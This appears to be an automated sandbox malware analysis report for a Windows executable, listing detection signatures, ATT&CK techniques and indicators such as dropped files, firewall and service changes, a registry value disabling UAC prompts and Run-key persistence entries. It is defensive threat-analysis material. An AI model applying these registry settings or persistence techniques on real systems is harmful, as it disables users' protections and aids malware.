3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf

Analysis

max time kernel
150s
max time network
155s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
26-11-2024 21:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
Size

5.5MB
MD5

f76848eea998d73bdb1bb808a7526686
SHA1

cce025a7112536ace2f92da5e46828d268339ab7
SHA256

3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf
SHA512

9fd839734326de1dfc9fd144b1fc113be0068185687baafbebed7b7831cdcd322a149f5c3b42c2c37876aec4f510171990d293e864b0907a08b595e5fc4c4da5
SSDEEP

98304:q4sVoAHIDycLz+i0OAy0AZn8YMT40RWVSEOr0mxnmLsP2PUDgCEGYeXIK2hrhKH:tsVtaLCis+RYlRjEcMDP2g7aXI94

Score

10^/10

discovery evasion execution exploit persistence phishing privilege_escalation trojan upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1536	powershell.exe
2552	powershell.exe
2372	powershell.exe
2080	powershell.exe
3064	powershell.exe
1656	powershell.exe
2112	powershell.exe
1704	powershell.exe
2516	powershell.exe
1112	powershell.exe

Modifies Windows Firewall 2 TTPs 36 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
108	netsh.exe
3044	netsh.exe
2340	netsh.exe
2788	netsh.exe
1992	netsh.exe
2668	netsh.exe
872	netsh.exe
2916	netsh.exe
2680	netsh.exe
2284	netsh.exe
2092	netsh.exe
2280	netsh.exe
1536	netsh.exe
2236	netsh.exe
2812	netsh.exe
2832	netsh.exe
752	netsh.exe
1068	netsh.exe
2724	netsh.exe
924	netsh.exe
2468	netsh.exe
2880	netsh.exe
1728	netsh.exe
2940	netsh.exe
552	netsh.exe
1208	netsh.exe
1896	netsh.exe
584	netsh.exe
2428	netsh.exe
3028	netsh.exe
2584	netsh.exe
2476	netsh.exe
760	netsh.exe
1620	netsh.exe
2380	netsh.exe
676	netsh.exe

Possible privilege escalation attempt 13 IoCs

exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid	Process
2652	takeown.exe
2832	icacls.exe
2860	icacls.exe
2356	icacls.exe
2384	takeown.exe
3048	icacls.exe
3008	icacls.exe
2252	icacls.exe
1324	icacls.exe
2336	icacls.exe
1708	icacls.exe
3016	takeown.exe
3044	icacls.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
A potential corporate email address has been identified in the URL: c@s
phishing

Executes dropped EXE 30 IoCs

Processes:

bip39-master-recovery®.exec.o.s.r-v9'.exesys-version27'.exebip39-master-recover.exesys-v17'.exegithub.exesys-networks'.exesecuresatudua-x64.exekvdb.x64.exeacgst-12-qknci.exegithub.exeacgst-v12.exegetapcc-v+.exegetapcc-v+.exetaskhosts.exeserviceapple.exehandler+.exeskrip.exehandlersuperdat.exeappleprocess.exeget.exesuperdat.exe[email protected]sshclients.exenotif-firts-.exenotif-firts.exegetrunstime.exe[email protected]getc.o.s.r.exegetc.o.s.r.exe

pid	Process
2980	bip39-master-recovery®.exe
864	c.o.s.r-v9'.exe
2756	sys-version27'.exe
2812	bip39-master-recover.exe
2360	sys-v17'.exe
2136	github.exe
1144	sys-networks'.exe
2780	securesatudua-x64.exe
1124	kvdb.x64.exe
2808	acgst-12-qknci.exe
2252	github.exe
2348	acgst-v12.exe
2056	getapcc-v+.exe
2728	getapcc-v+.exe
2352	taskhosts.exe
296	serviceapple.exe
3036	handler+.exe
2500	skrip.exe
2872	handlersuperdat.exe
580	appleprocess.exe
2976	get.exe
784	superdat.exe
2204	[email protected]
760	sshclients.exe
2136	notif-firts-.exe
2244	notif-firts.exe
304	getrunstime.exe
2496	[email protected]
908	getc.o.s.r.exe
2348	getc.o.s.r.exe

Loads dropped DLL 39 IoCs

Processes:

3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.execmd.exec.o.s.r-v9'.execmd.execmd.execmd.execmd.exetaskhosts.execmd.execmd.execmd.exe[email protected]notif-firts-.execmd.execmd.exe

pid	Process
1684	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
1648	cmd.exe
864	c.o.s.r-v9'.exe
1648	cmd.exe
1648	cmd.exe
952	cmd.exe
952	cmd.exe
952	cmd.exe
2140	cmd.exe
2140	cmd.exe
2140	cmd.exe
2624	cmd.exe
2624	cmd.exe
2624	cmd.exe
1784	cmd.exe
1784	cmd.exe
1784	cmd.exe
1784	cmd.exe
1784	cmd.exe
2352	taskhosts.exe
1784	cmd.exe
2772	cmd.exe
2772	cmd.exe
2756	cmd.exe
2772	cmd.exe
800	cmd.exe
800	cmd.exe
2756	cmd.exe
1648	cmd.exe
2204	[email protected]
1648	cmd.exe
2136	notif-firts-.exe
2780	cmd.exe
2780	cmd.exe
1648	cmd.exe
2932	cmd.exe
2932	cmd.exe
2932	cmd.exe
2932	cmd.exe

Modifies file permissions 1 TTPs 13 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
1708	icacls.exe
2384	takeown.exe
3048	icacls.exe
2652	takeown.exe
2832	icacls.exe
2860	icacls.exe
1324	icacls.exe
2336	icacls.exe
3016	takeown.exe
3044	icacls.exe
3008	icacls.exe
2252	icacls.exe
2356	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SmartAudioFilterAgent = "C:\\Windows\\java\\audiocheck.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsTask = "C:\\Windows\\java\\taskhosts.exe"	reg.exe

Drops file in System32 directory 64 IoCs

Processes:

handler+.exe[email protected]3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exesecuresatudua-x64.exegithub.exepowershell.execmd.exec.o.s.r-v9'.exesshclients.exesuperdat.execmd.exeacgst-12-qknci.exeacgst-v12.exesys-networks'.exehandlersuperdat.exeattrib.exesys-v17'.exegithub.exepowershell.exekvdb.x64.exepowershell.exe

description	ioc	Process
File created	C:\Windows\SysWOW64\java\handler+.shanghai	handler+.exe
File created	C:\Windows\SysWOW64\java\__tmp_rar_sfx_access_check_259587847	[email protected]
File opened for modification	C:\Windows\SysWOW64\java\bip39-master-recover.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\[email protected]	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\System32\securesatudua.bat	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\acgst-v12.exe	github.exe
File created	C:\Windows\System32\exclusions.ini.obsolete	securesatudua-x64.exe
File opened for modification	C:\Windows\System32\-.lnk	securesatudua-x64.exe
File opened for modification	C:\Windows\SysWOW64\java\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\superdat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\java\[email protected]	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File opened for modification	C:\Windows\SysWOW64\xml	c.o.s.r-v9'.exe
File opened for modification	C:\Windows\SysWOW64\xml\sys-version27'.exe	c.o.s.r-v9'.exe
File opened for modification	C:\Windows\System32\exceptions.dat	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\getrunstime.exe	sshclients.exe
File created	C:\Windows\SysWOW64\java\superdat\-\nodf-86x64.linux	superdat.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\time-1.vbs	cmd.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\time-6.vbs	cmd.exe
File created	C:\Windows\SysWOW64\java\Acquisition-clients@ssh™.sh	[email protected]
File opened for modification	C:\Windows\System32\securesatudua.bat	securesatudua-x64.exe
File created	C:\Windows\System32\avgexc.ini	securesatudua-x64.exe
File opened for modification	C:\Windows\SysWOW64\java\github	acgst-12-qknci.exe
File created	C:\Windows\SysWOW64\java\zipped.exe	acgst-v12.exe
File created	C:\Windows\SysWOW64\xml\sys-v17'.exe	c.o.s.r-v9'.exe
File created	C:\Windows\SysWOW64\java\kvdb.x64.exe	sys-networks'.exe
File created	C:\Windows\System32\__tmp_rar_sfx_access_check_259522342	securesatudua-x64.exe
File created	C:\Windows\System32\exclusions.ini	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\(su_interrupts_86x64)™ .dmg	handlersuperdat.exe
File created	C:\Windows\SysWOW64\java\superdat\-\superdatgeneral™.bat	superdat.exe
File created	C:\Windows\SysWOW64\java\superdat\-\superdat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\time-4.vbs	cmd.exe
File opened for modification	C:\Windows\SysWOW64\java\bip39-master-recovery®.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\System32\AVWIN.INI	securesatudua-x64.exe
File opened for modification	C:\Windows\System32\exclusions.ini	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\acgst-v12#.deb	acgst-12-qknci.exe
File opened for modification	C:\Windows\SysWOW64\java\Acquisition-clients@ssh™.sh	[email protected]
File created	C:\Windows\SysWOW64\java\getrunstime™#.dat	sshclients.exe
File opened for modification	C:\Windows\SysWOW64\java	attrib.exe
File created	C:\Windows\SysWOW64\java\c20-networks.rpm	sys-v17'.exe
File created	C:\Windows\SysWOW64\java\sys-networks'.exe	github.exe
File opened for modification	C:\Windows\SysWOW64\java\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\java\sshclients.exe	[email protected]
File created	C:\Windows\SysWOW64\java\__tmp_rar_sfx_access_check_259510720	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\bip39-master-recover.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File opened for modification	C:\Windows\SysWOW64\java\c.o.s.r-v9'.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\acgst-v12-terkunci.exe	acgst-12-qknci.exe
File created	C:\Windows\SysWOW64\java\handler+.exe	acgst-v12.exe
File created	C:\Windows\SysWOW64\java\handlersuperdat.exe	handler+.exe
File opened for modification	C:\Windows\SysWOW64\java\superdat\-\time-7.vbs	cmd.exe
File opened for modification	C:\Windows\SysWOW64\xml\sys-v17'.exe	c.o.s.r-v9'.exe
File created	C:\Windows\System32\secure1.bat-del	securesatudua-x64.exe
File opened for modification	C:\Windows\System32\avgexc.ini	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\settings.kvdb-wal.rpm	kvdb.x64.exe
File created	C:\Windows\SysWOW64\java\notif-firts-.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\kvdb.x32.exe	sys-networks'.exe
File created	C:\Windows\SysWOW64\java\c.o.s.r-v20'#.dat	sys-networks'.exe
File created	C:\Windows\System32\-.lnk	securesatudua-x64.exe
File created	C:\Windows\SysWOW64\java\settings.kvdb-wal	kvdb.x64.exe
File opened for modification	C:\Windows\SysWOW64\java\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\java\github.exe	acgst-12-qknci.exe
File created	C:\Windows\SysWOW64\java\handler+.viet	handler+.exe
File opened for modification	C:\Windows\SysWOW64\java	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\bip39-master-recovery®.exe	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
File created	C:\Windows\SysWOW64\java\sys-c.o.s.r-terkunci.exe	sys-v17'.exe

UPX packed file 30 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x000500000001a4b4-292.dat	upx
behavioral1/memory/1784-889-0x00000000020C0000-0x00000000021AF000-memory.dmp	upx
behavioral1/memory/2056-891-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2056-894-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2728-897-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/800-990-0x0000000002110000-0x00000000021FF000-memory.dmp	upx
behavioral1/memory/2976-991-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2976-1247-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/800-1243-0x0000000002110000-0x00000000021FF000-memory.dmp	upx
behavioral1/memory/2976-1723-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2976-2001-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2145-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2976-2295-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/304-2395-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2424-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2425-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2976-2427-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/304-2428-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2537-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2976-2538-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/304-2539-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2540-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2976-2541-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2543-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2976-2544-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2546-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2976-2547-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2549-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/908-2552-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2348-2556-0x0000000000400000-0x00000000004EF000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

Processes:

cmd.exe

description	ioc	Process
File created	C:\Program Files\WinRAR\rar.exe	cmd.exe
File opened for modification	C:\Program Files\WinRAR\rar.exe	cmd.exe

Drops file in Windows directory 12 IoCs

Processes:

attrib.exetaskhosts.exeserviceapple.exeappleprocess.exeskrip.exe

description	ioc	Process
File opened for modification	C:\Windows\java	attrib.exe
File created	C:\Windows\java\__tmp_rar_sfx_access_check_259554182	taskhosts.exe
File created	C:\Windows\java\skrip.exe	serviceapple.exe
File created	C:\Windows\java\skrip	serviceapple.exe
File created	C:\Windows\java\get.exe	appleprocess.exe
File created	C:\Windows\java\taskhosts10'.apx	appleprocess.exe
File created	C:\Windows\java\taskhosts10'.cer	appleprocess.exe
File created	C:\Windows\java\serviceapple.exe	taskhosts.exe
File opened for modification	C:\Windows\java\serviceapple.exe	taskhosts.exe
File created	C:\Windows\java\applet+terkunci.exe	serviceapple.exe
File created	C:\Windows\java\serviceapplet+bknci'.rpm	serviceapple.exe
File created	C:\Windows\java\appleprocess.exe	skrip.exe

Launches sc.exe 16 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
2916	sc.exe
1828	sc.exe
3052	sc.exe
928	sc.exe
1068	sc.exe
2364	sc.exe
2176	sc.exe
1808	sc.exe
2600	sc.exe
2296	sc.exe
2476	sc.exe
2028	sc.exe
1208	sc.exe
2284	sc.exe
1616	sc.exe
2128	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exereg.exeicacls.exefind.exesys-version27'.exereg.exefind.exe[email protected]PING.EXEsys-networks'.exehandlersuperdat.exetimeout.exegetapcc-v+.exeattrib.exeattrib.execmd.exe3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exetaskhosts.exeskrip.execmd.exetimeout.exe[email protected]getc.o.s.r.exeacgst-12-qknci.execmd.exefindstr.exefindstr.exenotif-firts.exegetapcc-v+.exeacgst-v12.exec.o.s.r-v9'.exesuperdat.exeattrib.exeIEXPLORE.EXEcmd.exetimeout.exenotif-firts-.execmd.execmd.exegithub.execscript.exefindstr.exeattrib.execmd.exefind.execmd.exeget.exetimeout.exegetrunstime.execmd.exereg.execmd.exeicacls.exetimeout.exesshclients.exebip39-master-recovery®.exeicacls.exePING.EXEPING.EXEfind.exegetc.o.s.r.execmd.exePING.EXEreg.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sys-version27'.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sys-networks'.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	handlersuperdat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getapcc-v+.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3a588b6fc7d66a122adc5f3c54af44e3ccbb8c838a97ef50a700503725135bbf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhosts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skrip.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getc.o.s.r.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acgst-12-qknci.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notif-firts.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getapcc-v+.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acgst-v12.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c.o.s.r-v9'.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	superdat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notif-firts-.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	github.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
